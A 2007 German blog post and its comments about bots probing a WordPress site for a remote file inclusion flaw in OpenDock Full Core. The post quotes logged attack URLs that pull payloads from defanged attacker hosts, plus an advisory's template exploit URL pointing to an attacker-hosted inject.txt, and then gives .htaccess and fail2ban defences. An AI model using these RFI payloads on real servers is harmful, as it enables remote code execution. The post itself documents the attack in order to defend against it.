Software Guide

Die besten Tipps, Anleitungen und Downloads

Ihre Werbung auf Software Guide

Sie möchten in dieser Box oder an anderer Stelle dieser Webseiten eine Werbung schalten? Sehen Sie sich dazu am besten einfach mal die verschiedenen Möglichkeiten an.

WordPress: Attacken wegen aktivierter Permalinks

2. Januar 2007 von Michael | Wordpress

Erst kürzlich habe ich das WordPress-Plugin Log 404 installiert. Dieses Plugin zeichnet die 100 letzten 404-Fehler („Webseite nicht gefunden“) auf und ist damit eine prima Admin-Unterstützung, um tote Links aufzuspüren, die man ggf. umbiegen sollte, weil regelmäßig darauf zugegriffen wird.

Ich habe das Plugin ein paar Tagen im Einsatz und stelle nun immer wieder Massen-Zugriffe auf folgenden Pfad fest:

sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://artelj.com/c.ar?
sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://empzone.com/c.ar??

Bei Software Guide gibt es weder den Verzeichnispfad /wordpress/lib_comment/ noch gibt es dort diese comment.php. Googlen nach lib_comment/comment.php?doc_directory bringt aber einschlägige Ergebnisse zu Tage:

OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/comment.php not properly sanitizing user input supplied to the ‚doc_directory‘ variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
(…)
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
(…)
http://[target]/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=
http://[attacker]/inject.txt?

Was bedeutet das jetzt?

Hat man in WordPress Permalinks aktiviert und auf eine Seite zugegriffen die es nicht gibt, so wird durch die Rewrite-Regeln auf eine 404-Fehlerseite weitergeleitet. Ein automatisierter Bot merkt dabei aber nicht, dass es sich um einen 404-Fehler handelt und durch das Rewrite erfolgt auch kein Eintrag in die Webserver-Logfiles diesbezüglich.

Dieser Hacker hat nun wohl einen Bot laufen, der beim Zugriff auf /wordpress/lib_comment/ auf keinen Fehler stößt. Daher meint der Bot, es gibt das Verzeichnis und geht dann gleich mal davon aus, es handelt sich um die o.g. Software, dessen Sicherheitslücke noch nicht geschlossen wurde. Also wird angegriffen.

Dies zumindest meine Interpretation.

Lt. 404-Logfiles erfolgen diese Angriffe ca. 30-60mal pro Sekunde, von mehr als 10 unterschiedlichen und auch regelmäßig wechselnden IP-Adressen. Das ganze kann mehrere Stunden gehen, dann Pause, dann kommt der Bot wieder.

Was dagegen machen?
Ich habe jetzt auf die Schnelle folgende Zeilen in der .htaccess-Datei im Hauptverzeichnis hinzugefügt:

RewriteEngine On
RewriteRule wordpress/lib_comment - [F]

Das liefert bei Zugriff auf dieses Verzeichnis einen Fehler 403 („Forbidden“, also Verboten) aus. Was server-schonenderes ist mir im Moment noch nicht eingefallen. Ein RewriteRule lib_comment - [F] würde es auch tun und würde praktisch jedes Verzeichnis sperren, das den Namensbestandteil „lib_comment“ enthält. Ich wollte die Regel aber nicht zu allgemein formulieren.

Das Log-404-Plugin hat sich jedenfalls schon sehr bewährt und ich werde das jetzt vermehrt im Auge behalten, wer hier sonst noch so zugreift.

Informationen zum Artikel:

Weiterblättern im Blog:

8 Comments:

Gravatar

1

Metty

3. Januar 2007, 7:04

Guten Morgen.

Ich hatte dieses, bzw. ein ähnliches Problem auch. Sind die Bots bei Dir auch mit UserAgent Maxthon gekennzeichnet?

Ich habe im endeffekt fail2ban umgebogen nach 2 Zugriffen auf diese nichtvorhandene Datei die IP via IPTables für X-Minuten zu sperren, bzw. im Endeffekt als Permaban, da nach dem Unbann die entsprechenden IPs direkt wieder gebannt wurden, und das bei einer Banzeit von 40000s.
Aber durch das Blocken via IPTables wird am wenigsten Ressource verbraten.

Kannst Dich ja melden, bzw bei mir mal schauen, hab bisserl was dazu geschrieben.

Gravatar

2

Joerg

3. Januar 2007, 20:33

Und da fühle ich mich schon genervt von den ganzen Formmail- und Frontpagesuchern. Übrigens ein nettes Script mit dem man fehlende Dateien finden kann gibts hier http://www.mrbobswebdesign.com.....generator/

Gravatar

3

Michael (Author)

4. Januar 2007, 0:15

Danke Metty für den Hinweis, hab vorhin bei Dir im Blog nachgelesen. Ist bei Dir ja auch extrem. Da mein Blog nich auf einem Rootserver läuft, hab ich nicht wirklich Möglichkeiten, hier serverseitig einzugreifen. Useragent wird mit dem WordPress-Plugin Log 404 nicht mitgeloggt. Ich schau mal eben in die Apache-Log ……. ist libwww-perl/5.79. Apache-Log hat übrigens 20 MB und 81600 Zeilen. Und ist nur von 24 Stunden (02.01.2006). Schaut man sich besser nicht näher an, um sich nicht noch mehr über Attacken und Spammer zu ärgern.

@Joerg: danke für den Link

Gravatar

4

Roland Haeder

4. Januar 2007, 18:51

Ich habe hier Cracker-Tracker von http://www.cback.de im Einstz. Funktioniert wunderbar mit WordPress zusammen. :) Bei Interesse maile ich meine gepachte Version euch gerne zu. Ihr koennt sie auch auf meinem Blog in der Suchmaske suchen und dann hoffentlich finden…

Link

Wichtig: Der IP-Filter von mir ist mit WordPress inkompatibel! Bitte nicht verwenden.

Gravatar

5

Monika

4. Januar 2007, 20:39

Hi
ich habe das nie aber ich habe auch bot-trap.de im Einsatz…

ich mache dafür gern unverschämt Werbung, denn ich mag mir meine htaccess nicht elends zumüllen…

lg

Gravatar

6

Metty

4. Januar 2007, 21:22

Monika, Bot-Trap nutzt dir in so einem Fall herzlich wenig, da der Apache trotzdem 403 raushauen muss, bzw. auf die massiven Anfragen antworten.
Habe selber auch Bot-Trap aktiv, und durch eine Erweiterung um diesen UserAgent auf Besserung gehofft, aber wie gesagt, nutzt bei sowas leider nicht.
Aber ansonsten recht gut.

Gravatar

7

Roland Haeder

22. Februar 2007, 13:22

Ich nutze Spider-Trap. Der hat bei mir schon exakt 428 IP-Nummern gesperrt. Dieser „Trick“ hat aber nur gegen „dumme Wiederholungstaeter“ Wirkung. „Schlaue“ Spambots ignorieren die in der robots.txt gesperrten Addressen (wie z.B. /guestbook/ bei mir der Fall ist, dies sollte eigentlich den Spambot drauf scharf machen, weil dort eventuell sich ein Gaestebuch mit schoenen Email-Adressen sich befindet… ;) )

Gruss,
Roland

Gravatar

8

Michael

12. Dezember 2007, 23:39

Also da muss ich Metty widersprechen. Vielleicht liegt es auch daran, dass ich durch mein WordPress die htaccess file so modifiziert habe, dass jeder Griff ins lehre auf die Startseite mit einer Fehlerausgabe im Titel führt. Sprich so oder so, werden gesprerrte PCs nicht weiterkommen. Ob er nun was findet oder nicht, vorher greift die Umleitung oder Bot-Trap. Dazu möchte ich auch gleich Werbung für mein neues Bot-Trap Plugin machen :-) Dieses liest die Log-File von Bot-Trap aus und zeit sie bequem im Admin-Panell. Grüße

Die Kommentarmöglichkeit ist derzeit für diesen Artikel ausgeschaltet.

Blog-Kategorien

Volltextsuche

Neueste Artikel

Neueste Kommentare

Neueste Trackbacks/Pingbacks

Andere Projekte

Blogparade

dient als zentrale Anlaufstelle für Blog-Paraden bzw. Blog-Karnevals und andere von BloggerInnen veranstaltete Aktionen.

Mediadaten

Feed-Statistik:
Feedburner

Software Guide gibt es seit Dezember 2005 und es werden durchschnittlich 2 Blog- Beiträge/Monat veröffentlicht. Die Themenschwerpunkte sind in der Tagcloud ersichtlich. Mehr Infos...

Links

 

Nach oben

Wordpress

© 2005-2024 Software Guide | ISSN 1864-9599